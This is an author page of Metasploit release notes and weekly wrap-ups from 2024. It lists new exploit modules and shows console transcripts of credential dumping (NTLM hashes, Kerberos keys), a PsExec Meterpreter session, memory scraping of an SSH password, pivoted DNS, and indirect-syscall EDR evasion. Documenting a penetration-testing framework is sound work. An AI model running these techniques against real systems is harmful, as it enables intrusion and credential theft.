Spencer McIntyre – CyberSecurity Confabulation

Metasploit Weekly Wrap-Up 09/13/2024

SPIP Modules

This week brings more modules targeting the SPIP publishing platform. SPIP has gained some attention from Metasploit community contributors recently and has inspired some PHP payload and encoder improvements.

New module content (2)

SPIP BigUp Plugin Unauthenticated RCE

Authors: Julien Voisin, Laluka, Valentin Lobstein, and Vozec
Type: Exploit
Pull request: #19444 contributed by Chocapikk
Path: multi/http/spip_bigup_unauth_rce
AttackerKB reference: CVE-2024-8517

Description: This adds an exploit module for CVE-2024-8517, an unauthenticated RCE able to execute arbitrary PHP code.

SPIP connect Parameter PHP Injection

Authors: Arnaud Pachot, Davy Douhine, Frederic Cikala, and Valentin Lobstein
Type: Exploit
Pull request: #19432 contributed by Chocapikk
Path: multi/http/spip_connect_exec
CVE reference: BID-54292

Description: Refactor SPIP Modules for Windows Compatibility and Incorporating SPIP Mixin.

Enhancements and features (3)

#19330 from heyder - The start_service method in the http_server.rb library now allows users to specify their SSL preferences directly through the opts parameter. If the ssl option is not provided in opts, it will default to the value in datastore["SSL"].
#19352 from zgoldman-r7 - Adjusts the metadata for the ldap login scanner, adding defaults and adjusting the service and protocol values.
#19432 from Chocapikk - Refactor SPIP Modules for Windows Compatibility and Incorporating SPIP Mixin.

Bugs fixed (1)

#19439 from bcoles - This explicitly defines x86 and x64 as supported architectures for the bypassuac_comhijack module. Prior to this change there were no defined architectures and if you tried to use an x64 based payload the module would fail.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

NEVER MISS AN EMERGING THREAT

Be the first to learn about the latest vulnerabilities and cybersecurity news.

Metasploit Wrap-Up 05/17/2024

Posted 4 months ago by Spencer McIntyre

LDAP Authentication Improvements

This week, in Metasploit v6.4.9, the team has added multiple improvements for LDAP related attacks. Two improvements relating to authentication is the new support for Signing and Channel Binding. Microsoft has been making changes to harden the communications to Domain Controllers. Organizations are incorporating these policies which are making LDAP tools without the necessary features unable to operate. The intention behind these changes are to protect communications with Domain Controllers from relay attacks. There are however plenty of scenarios when users may want to authenticate to a domain controller directly with known credentials to perform a variety of tasks.

The new improvements allow Metasploit users to authenticate via either NTLM or Kerberos to LDAP servers with these hardening settings in place. Signing will be performed opportunistically (LDAP::Signing=auto), however it can be either disabled entirely by setting LDAP::Signing to disabled or required with required. Note that setting it to required will raise exceptions with configurations that are incompatible with signing, e.g. connecting over SSL (LDAPS) or using plaintext / simple authentication. At this time channel binding is automatically enabled and can not be disabled in the same way. When connecting over SSL, and authenticating with either NTLM or Kerberos, the binding information is provided to the server.

For users that are unfamiliar with the semi-recent authentication configuration changes introduced in Metasploit v6.3, LDAP modules have an LDAP::Auth option that can be set to one of auto, ntlm, kerberos, schannel, or plaintext.

LDAP Session

In addition to the new LDAP authentication improvements, Metasploit added the latest session type; LDAP sessions this week. Metasploit v6.4 added new protocol-based sessions that allow modules to be run against persistent connections for a variety of services including SMB, MSSQL and MySQL. Once the feature is enabled by running features set ldap_session_type true, users can open sessions with the auxiliary/scanner/ldap/ldap_login module and CreateSession option. These new sessions allow a users to authenticate once and interact with the connection, running queries or modules such as:

auxiliary/admin/ldap/rbcd – Role Based Constrained Delegation
auxiliary/admin/ldap/shadow_credentials – Shadow Credentials
auxiliary/gather/asrep – Find Users Without Pre-Auth Required (ASREP-roast)
auxiliary/gather/ldap_esc_vulnerable_cert_finder – Misconfigured Certificate Template Finder
auxiliary/admin/ldap/ad_cs_cert_template – AD CS Certificate Template Management
auxiliary/gather/ldap_hashdump – LDAP Information Disclosure
auxiliary/gather/ldap_query – LDAP Query and Enumeration Module

By interacting with the session, the query command becomes available to run queries interactively. It has a few options allowing the scope, attributes and filter to be set.

LDAP (192.0.2.197) > query -h
Usage: query -f <filter string> -a <attributes>

Run the query against the session.

OPTIONS:

    -a, --attributes      Comma separated list of attributes for the query
    -b, --base-dn         Base dn for the query
    -f, --filter          Filter string for the query (default: (objectclass=*))
    -h, --help            Help menu
    -o, --output-format   Output format: `table`, `csv` or `json` (default: table)
    -s, --scope           Scope for the query: `base`, `single`, `whole` (default: whole)

As an example, basic information about the domain can be queried:

LDAP (192.0.2.197) > query -a ms-DS-MachineAccountQuota,objectSID,name -f '(objectClass=domain)'
DC=labs1collabu0,DC=local
=========================

 Name                       Attributes
 ----                       ----------
 ms-ds-machineaccountquota  10
 name                       labs1collabu0
 objectsid                  S-1-5-21-795503-3050334394-3644400624

New module content (2)

Windows Registry Security Descriptor Utility

Author: Christophe De La Fuente
Type: Auxiliary
Pull request: #19115 contributed by cdelafuente-r7
Path: admin/registry_security_descriptor

Description: This adds a module to read and write the security descriptor of Windows registry keys.

Kemp LoadMaster Local sudo privilege escalation

Authors: Dave Yesland with Rhino Security Labs and bwatters-r7
Type: Exploit
Pull request: #19100 contributed by bwatters-r7
Path: linux/local/progress_kemp_loadmaster_sudo_privesc_2024

Description: This adds a privilege escalation exploit module for LoadMaster that abuses the configuration of the sudo command combined with weak file system permissions. There is no CVE for this vulnerability.

Enhancements and features (2)

#19058 from dwelch-r7 - This adds an LDAP session type allowing users and modules to interact directly with LDAP servers without uploading a payload.
#19132 from zeroSteiner - Add channel binding information to Metasploit's NTLM and Kerberos authentication for the LDAP protocol. This enables users to authenticate to domain controllers where the hardened security configuration setting is in place.
#19172 from cgranleese-r7 - Updates the debug command to export the currently enabled user features.

Bugs fixed (1)

#19183 from adfoster-r7 - Fix windows platform detection bug when running on a UCRT compiled environment.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up 04/26/24

Posted 5 months ago by Spencer McIntyre

Rancher Modules

This week, Metasploit community member h00die added the second of two modules targeting Rancher instances. These modules each leak sensitive information from vulnerable instances of the application which is intended to manage Kubernetes clusters. These are a great addition to Metasploit’s coverage for testing Kubernetes environments.

PAN-OS RCE

Metasploit also released an exploit for the unauthenticated RCE in PAN-OS that has been receiving a lot of attention recently. This vulnerability is an unauthenticated file creation that can be leveraged to trigger the execution of remote commands. See Rapid7’s analysis on AttackerKB for an in depth explanation of the root cause.

New module content (8)

Rancher Authenticated API Credential Exposure

Authors: Florian Struck, Marco Stuurman, and h00die
Type: Auxiliary
Pull request: #18956 contributed by h00die
Path: gather/rancher_authenticated_api_cred_exposure
AttackerKB reference: CVE-2021-36782

Description: This adds an exploit for CVE-2021-36782, a vulnerability which can be leveraged by an authenticated attacker to leak API credentials from an affected Rancher instance.

Gitlab Version Scanner

Author: Julien (jvoisin) Voisin
Type: Auxiliary
Pull request: #18723 contributed by jvoisin
Path: scanner/http/gitlab_version

Description: A web page exists that can be reached without authentication that contains a hash that can be used to determine the approximate version of gitlab running on the endpoint. This PR enhances our current GitLab fingerprinting capabilities to include the aforementioned technique.

Apache Solr Backup/Restore APIs RCE

Authors: jheysel-r7 and l3yx
Type: Exploit
Pull request: #19046 contributed by jheysel-r7
Path: linux/http/apache_solr_backup_restore
AttackerKB reference: CVE-2023-50386

Description: Adds apache_solr_backup_restore module, taking advantage of a Unrestricted Upload of File with Dangerous Type vulnerability, allowing the user to gain a session in an Apache Solr instance for remote code execution.

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Authors: remmons-r7 and sfewer-r7
Type: Exploit
Pull request: #19101 contributed by remmons-r7
Path: linux/http/panos_telemetry_cmd_exec
AttackerKB reference: CVE-2024-3400

Description: This adds an exploit module for https://security.paloaltonetworks.com/CVE-2024-3400, affecting PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled.

GitLens Git Local Configuration Exec

Authors: Paul Gerste and h00die
Type: Exploit
Pull request: #18997 contributed by h00die
Path: multi/fileformat/gitlens_local_config_exec
AttackerKB reference: CVE-2023-46944

Description: This adds a FileFormat exploit for VSCode. The VSCode extension GitLens by GitKraken before v.14.0.0 allows an untrusted workspace to execute git commands. A repo may include its own .git folder including a malicious config file to execute arbitrary code.

Code Reviewer

Author: h00die
Type: Exploit
Pull request: #18996 contributed by h00die
Path: multi/fileformat/visual_studio_vsix_exec

Description: This adds a new exploit module that creates a malicious VS / VSCode extension file.

Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability

Authors: h00die-gr3y h00die.gr3y@gmail.com and usd Herolab
Type: Exploit
Pull request: #19005 contributed by h00die-gr3y
Path: multi/http/gambio_unauth_rce_cve_2024_23759
AttackerKB reference: CVE-2024-23759

Description: This adds a module for a Remote Code Execution vulnerability in Gambio Online Webshop version 4.9.2.0 and lower allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.

FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE

Authors: James Horseman, Spencer McIntyre, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #19082 contributed by jheysel-r7
Path: windows/http/forticlient_ems_fctid_sqli
AttackerKB reference: CVE-2023-48788

Description: Adds windows/http/forticlient_ems_fctid_sqli module that takes advantage of a SQLi injection vulnerability in FortiNet FortiClient EMS.

Enhancements and features (11)

#17294 from adfoster-r7 - This adds a new EVENT_DEPENDENT value for module reliability metadata.
#18723 from jvoisin - A web page exists that can be reached without authentication that contains a hash that can be used to determine the approximate version of gitlab running on the endpoint. This PR enhances our current GitLab fingerprinting capabilities to include the aforementioned technique.
#18914 from dotslashsuperstar - This PR adds functionality so that CVE and URL references will be imported from an OpenVAS XML report by default. DNF-CERT and CERT-BUND references can also be collected by sending additional flags to the db_import command.
#19054 from zgoldman-r7 - Adds NText column parsing to MSSQL modules.
#19066 from sjanusz-r7 - Adds automated tests for multiple SMB modules.
#19078 from dwelch-r7 - Fixes a crash in the modules/auxiliary/gather/ldap_query.rb module when running queries from a file.
#19080 from cgranleese-r7 - Adds architecture and platform detection for PostgreSQL sessions.
#19086 from nrathaus - Update Metasploit's RPC to expose module's default_options metadata.
#19105 from zgoldman-r7 - Not written.
#19112 from zgoldman-r7 - Adds architecture and platform detection for MSSQL sessions.
#19122 from h00die - Adds additional reliability metadata to exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.

Bugs fixed (6)

#19079 from nrathaus - Fixes an issue were the password_spray module option was being ignored.
#19089 from adfoster-r7 - This PR fixes a bug where a user might get an unexpected NoMethodError running the linux/local/exim4_deliver_message_priv_esc module.
#19111 from zeroSteiner - This PR fixes a bug where a user can specify an invalid payload architecture for a given exploit target. Previously, it was not possible to tab-complete an invalid payload, but this enforces the architecture limitations with a run-time exception before sending the exploit.
#19113 from adfoster-r7 - Fixes a regression that caused Metasploit to leak memory, and sometimes crash.
#19114 from zeroSteiner - This PR fixes several instances where we we pass nil values rather than the types expected, causing crashes and stack traces in LDAP-related modules.
#19129 from nrathaus - This fixes a bug where the notes command included an example which contained a flag that was not supported.

Documentation added (1)

#19088 from adfoster-r7 - This PR adds documentation for running and writing Metasploit's unit tests.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Framework 6.4 Released

Posted 6 months ago by Spencer McIntyre

Today, Metasploit is pleased to announce the release of Metasploit Framework 6.4. It has been just over a year since the release of version 6.3 and the team has added many new features and improvements since then.

For news reporters, please reach out to press@rapid7.com.

Kerberos Improvements

Metasploit 6.3 included initial support for Kerberos authentication within Metasploit and was one of the larger features in the release. Since then, Metasploit has continued to make Kerberos-related improvements, adding capabilities that didn’t make it into the 6.3 cut.

The auxiliary/admin/kerberos/forge_ticket module was updated with:
- Support for the diamond and sapphire techniques in addition to the original golden and silver techniques.
- The additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
We added the post/windows/manage/kerberos_tickets post module, which allows users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Example of running the gather/windows_secrets_dump module with Kerberos authentication and the DOMAIN action:

msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN
[*] Running module against 192.168.123.133

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Opening Service Control Manager
…
[*] 192.168.123.133:445 - Using cached credential for krbtgt/DEMO.LOCAL@DEMO.LOCAL vagrant@DEMO.LOCAL
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Bound to DRSR
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local
# SID's:
Administrator: S-1-5-21-1242350107-3695253863-3717863007-500
…

# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::
…

# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
…

# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6
…

[*] 192.168.123.133:445 - Cleaning up...
[*] Auxiliary module execution completed

DNS Configuration

One of the major benefits of using the Metasploit framework is the integrated way to pivot connections over established sessions without needing to set up proxies. This means that Metasploit often handles DNS queries for various services as modules are run. Over the past year, Metasploit has made improvements to how it handles its own DNS queries to ensure they are not leaked unintentionally.

Users can configure how hostnames should be resolved. This is particularly useful in pivoting scenarios to ensure that the requests for a specific domain (or all domains) are resolved using a configured nameserver optionally contacted via an established session. As an example, users can configure Metasploit to ensure that their DNS queries for internal resources are originating from a compromised host and not themselves.

Examples of manipulating the DNS configuration:

dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1
dns add --rule honeypot.lab.lan --index 2 black-hole
dns add-static example2.lab.lan 192.0.2.201
dns add --index 1 --rule * static system 192.0.2.1

Viewing the current configuration:

msf6 > dns print
Default search domain: N/A
Default search list:
  * tor.example.com
  * localdomain
Current cache size:    0

Resolver rule entries
=====================

   #  Rule              Resolver    Comm channel
   -  ----              --------    ------------
   1  *.lab.lan         192.0.2.1   Session 1
   2  honeypot.lab.lan  black-hole  N/A
   3  *
   .    \_              static      N/A
   .    \_              10.4.5.45
   .    \_              10.3.20.98


Static hostnames
================

   Hostname          IPv4 Address  IPv6 Address
   --------          ------------  ------------
   example.lab.lan   192.0.2.200
   example2.lab.lan  192.0.2.201

New session types

Metasploit 6.4 adds support for new PostgreSQL, MSSQL, MySQL and SMB session types. The SQL session types allow interactive queries with a remote database instance while the new SMB session will let you interact with a share, navigate directories, upload, and download files. All of these new session types can also be used with relevant auxiliary modules, meaning you can get a single SMB or SQL session and run multiple modules against the session without needing to reconnect each time.

New SMB Session Type Examples

You can open a new SMB session by setting the CreateSession option:

msf6 > use scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant CreateSession=true

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: '.\vagrant:vagrant' Administrator
[!] 192.168.123.133:445   - No active DB -- Credential data will not be saved!
[*] SMB session 2 opened (192.168.123.1:52253 -> 192.168.123.133:445) at 2024-03-19 12:07:15 +0000
[*] 192.168.123.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

The session will open as a new SMB session type:

msf6 auxiliary(scanner/smb/smb_login) > sessions
Active sessions
===============
  Id  Name  Type  Information                        Connection
  --  ----  ----  -----------                        ----------
  1         smb   SMB vagrant @ 192.168.123.133:445  192.168.123.1:53541 -> 192.168.123.133:445 (192.168.123.133)
msf6 auxiliary(scanner/smb/smb_login) >

Interacting with the session allows for direct file manipulation of the remote host including upload and download support:

msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 1…
SMB (192.168.123.133) > ls
[-] No active share selected. Use the shares command to view available shares, and shares -i <id> to interact with one
SMB (192.168.123.133) > shares
Shares
======
    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  foo       DISK
    3  IPC$      IPC|SPECIAL   Remote IPC
    4  NETLOGON  DISK          Logon server share
    5  SYSVOL    DISK          Logon server share

SMB (192.168.123.133) > shares -i foo
[+] Successfully connected to foo
SMB (192.168.123.136\foo) > ls
Shares
======
    #  Type  Name                 Created                    Accessed                   Written                    Changed                    Size
    -  ----  ----                 -------                    --------                   -------                    -------                    ----
    0  DIR   .                    2023-09-15T18:56:07+01:00  2023-10-10T12:39:26+01:00  2023-10-10T12:39:26+01:00  2023-10-10T12:39:26+01:00
    1  DIR   ..                   2021-05-08T09:06:51+01:00  2024-02-01T13:11:41+00:00  2024-02-01T13:11:41+00:00  2024-02-01T13:11:41+00:00
    2  FILE  passwords.docx       2023-10-10T12:34:57+01:00  2023-10-10T12:38:53+01:00  2023-10-10T12:38:53+01:00  2023-10-10T12:38:53+01:00  1403

The new session type supports using existing modules through the session types such as Metasploit’s secret’s dump module which will still keep the session alive afterwards:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > use auxiliary/gather/windows_secrets_dump
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(gather/windows_secrets_dump) > run session=-1

Or you can run Metasploit’s PsExec support with the SMB session to open a Meterpreter session:

msf6 > use windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > run session=-1
…
[*] Sending stage (176198 bytes) to 10.4.227.91
[*] Meterpreter session 2 opened (10.4.227.91:4444 -> 10.4.227.91:50319) at 2024-03-19 16:41:45 +0000
meterpreter >

Kerberos authentication is also supported:

msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local createsession=true 

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445   - 192.168.123.133:445   - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_903639.bin
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445   - 192.168.123.133:445   - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_231110.bin
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid delegation TGS-Response
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: 'demo.local\vagrant:vagrant' Administrator
[*] SMB session 3 opened (192.168.123.1:50336 -> 192.168.123.133:445) at 2024-03-19 16:43:01 +0000
[*] 192.168.123.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

New SQL Session Types Examples

Metasploit 6.4 has added support for PostgreSQL, MSSQL, MySQL session types. You can open a new SMB session by setting the CreateSession option:

msf6 > use auxiliary/scanner/mssql_login
msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password

Which will create a new SQL session:

[*] 192.168.2.242:1433    - 192.168.2.242:1433 - MSSQL - Starting authentication scanner.
[!] 192.168.2.242:1433    - No active DB -- Credential data will not be saved!
[+] 192.168.2.242:1433    - 192.168.2.242:1433 - Login Successful: WORKSTATION\user:password
[*] MSSQL session 1 opened (192.168.2.1:60963 -> 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500
[*] 192.168.2.242:1433    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Which you can interact with using sessions -i <session id> or sessions -i -1 to interact with the most recently opened session:

msf6 auxiliary(scanner/mssql/mssql_login) > sessions

Active sessions
===============

  Id  Name  Type   Information                     Connection
  --  ----  ----   -----------                     ----------
  1         mssql  MSSQL test @ 192.168.2.242:143  192.168.2.1:60963 -> 192.168.23                               .242:1433 (192.168.2.242)

msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
[*] Starting interaction with 1…
mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
Response
========
    #  NULL
    -  ----
    0  Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
	    Oct 8 2022 05:58:25
	    Copyright (C) 2022 Microsoft Corporation
	    Developer Edition (64-bit) on Windows Server 2022 Stand
       ard 10.0 <X64> (Build 20348: ) (Hypervisor)

The query_interactive command will start an interactive prompt for running multiple multi-line queries:

mssql @ 192.168.2.242:1433 (master) > query_interactive
[*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master)
[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
SQL >> select *
SQL *> from information_schema.tables
SQL *> where table_type = 'BASE TABLE';
[*] Executing query: select * from information_schema.tables where table_type = 'BASE TABLE';
Response
========
    #  TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME             TABLE_TYPE
    -  -------------  ------------  ----------             ----------
    0  master         dbo           spt_fallback_db        BASE TABLE
    1  master         dbo           spt_fallback_dev       BASE TABLE
    2  master         dbo           spt_fallback_usg       BASE TABLE
    4  master         dbo           Users                  BASE TABLE
    5  master         dbo           spt_monitor            BASE TABLE
    6  master         dbo           MSreplication_options  BASE TABLE
SQL >>

Similar to SMB sessions, the new SQL modules can run with multiple auxiliary modules, available modules can be searched for:

msf6 > search session_type:smb session_type:postgres session_type:mssql session_type:mysql

Indirect Syscalls Support for Windows Meterpreter

Indirect system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do this is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Syscalls are a way to run system routines directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with indirect syscalls to the corresponding native APIs. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is finding the correct syscall number since it is not the same across Windows versions. Also, EDRs usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo's Gate.

Another technique we incorporated is to ensure the call to the syscall instruction is made through ntdll.dll. This behavior is sometimes referred to as making an “indirect syscall”. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using indirect syscalls. The long-term goal is to make indirect syscalls a standard for any future Windows-based development (payload, exploit, etc.). Users do not need to make any changes in order to run Meterpreter with these new changes.

Discoverability Improvements

The definition of “a module” can be a nebulous thing. In recent years, some modules have begun to include multiple CVEs in a single exploit as part of a chain (e.g., Proxy(Not)Shell), while other CVEs affect multiple products and warrant multiple modules (e.g., Log4Shell). Furthermore, modules that aren’t exploiting a particular vulnerability often have different actions they can take, like forging different types of Kerberos tickets or running different LDAP queries for enumeration. As Metasploit development moves quickly, with new content being released each week, it can be difficult for users to find what they’re looking for.

Metasploit 6.4 has made some improvements to make discoverability easier for users. One of the largest changes is the new Hierarchical Search feature. This will cause Metasploit’s internal search capabilities to match additional fields within modules, including the actions, targets and AKA aliases. As an example, this will cause the auxiliary/admin/kerberos/forge_ticket module to show up when the user searches for forge_golden because it is an action of the module:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/forge_ticket                .                normal  No     Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging
   1    \_ action: FORGE_DIAMOND                           .                .       .      Forge a Diamond Ticket
   2    \_ action: FORGE_GOLDEN                            .                .       .      Forge a Golden Ticket
   3    \_ action: FORGE_SAPPHIRE                          .                .       .      Forge a Sapphire Ticket
   4    \_ action: FORGE_SILVER                            .                .       .      Forge a Silver Ticket
   5    \_ AKA: Ticketer                                   .                .       .      .
   6    \_ AKA: Klist                                      .                .       .      .
   7  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

msf6 auxiliary(scanner/mysql/mysql_hashdump) >

Windows Meterpreter Memory Searching

Metasploit 6.4 incorporates a new feature for Windows Meterpreter that allows for searching a process's memory for user-specified needles with support for regular expressions. This can be used to search for and find potentially sensitive data in memory near the needles, similar to Linux's MimiPenguin tool. This can be executed against any process with the same or lower privilege level as the Meterpreter session.

This new API is currently in use by the post/multi/gather/memory_search module, where it can be used to search for plaintext credentials - for instance in some configurations of OpenSSH:

msf6 post(multi/gather/memory_search) > run session=1 regex="publickey,password.*" process_names_glob="ssh*"

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        ssh.exe (pid: 2972)

[*] Memory Matches for ssh.exe (pid: 2972)
======================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x0000000A00060DF0  127           "publickey,password......3.......myverysecretpassword....................#.........#..........  0x0000000A00000000   0x0000000000090000
                                   ...........S......................"

[*] Post module execution completed

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Full diff 6.3.0...6.4.0

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Jack Heysel, Jacquie Harris, Jeffrey Martin, Navya Harika Karaka, Simon Janusz, Zach Goldman, Egor Kalinichev, and Spencer McIntyre.

Metasploit Weekly Wrap-Up 02/16/2024

Posted 7 months ago by Spencer McIntyre

New Fetch Payload

It has been almost a year since Metasploit released the new fetch payloads and since then, 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded that protocol support to include SMB, allowing payloads to be run using rundll32 which has the added benefit of capturing the NetNTLM hashes of the requestor.

This also streamlines the workflow the user would have previously used by first starting the exploit/windows/smb/smb_delivery module, and then copying the command into another exploit. Now the user can simply select one of the SMB-enabled fetch payloads and Metasploit will manage the service and generate the command.

As an added benefit, since #18680 merged into Metasploit, multiple SMB services can be run simultaneously. This means that multiple SMB-enabled fetch payloads can have their own independent handlers running at the same time.

New module content (2)

Base64 Command Encoder

Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner
